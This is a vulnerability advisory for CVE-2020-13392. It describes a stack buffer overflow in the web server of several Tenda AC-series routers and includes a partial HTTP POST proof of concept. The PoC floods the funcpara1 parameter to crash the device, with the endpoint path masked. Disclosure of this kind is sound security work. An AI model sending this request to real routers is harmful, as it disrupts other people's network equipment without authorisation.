CVE-2020-13392: Tenda Vulnerability

Vendor of the products:  Tenda 

Reported by:       Joel

CVE-2020-13392    CVE_details

Affected products:  

1
2
3
4
5

AC9 V1.0 V15.03.05.19(6318)_CN
AC9 V3.0 V15.03.06.42_multi
AC15 V1.0 V15.03.05.19_multi_TD01
AC18 V15.03.05.19(6318_)_CN
AC6 V1.0 V15.03.05.19_multi_TD01

Overview

An issue was discovered on Tenda AC6 V1.0 V15.03.05.19_multi_TD01, AC9 V1.0 V15.03.05.19(6318), AC9 V3.0 V15.03.06.42_multi, AC15 V1.0 V15.03.05.19_multi_TD01, AC18 V15.03.05.19(6318) devices. There is a buffer overflow vulnerability in the router’s web server – httpd. While processing the funcpara1parameter for a post request, the value is directly used in a sprintf to a local variable placed on the stack, which overrides the return address of the function. The attackers can construct a payload to carry out arbitrary code attacks.

POC

This PoC can result in a Dos.

Given the vendor’s security, we only provide parts of the HTTP.

1
2
3
4
5
6
7
8
9
10
11
12
13

POST /goform/********** HTTP/1.1  
Host: 192.168.18.131  
Accept:  */*  
X-Requested-With:  XMLHttpRequest  
User-Agent:  Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5)   AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100   Safari/537.36  
Content-Type: application/x-www-form-urlencoded  
Accept-Encoding:  gzip, deflate  
Accept-Language:  en-US,en;q=0.9  
Connection: close  
Content-Type: text/plain  
Cookie: password=ioo5gk  

save=1&msgname=1&funcname=save_list_data&funcpara1=11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111&funcpara2=222222222222222222222222

Details

ARM

MIPS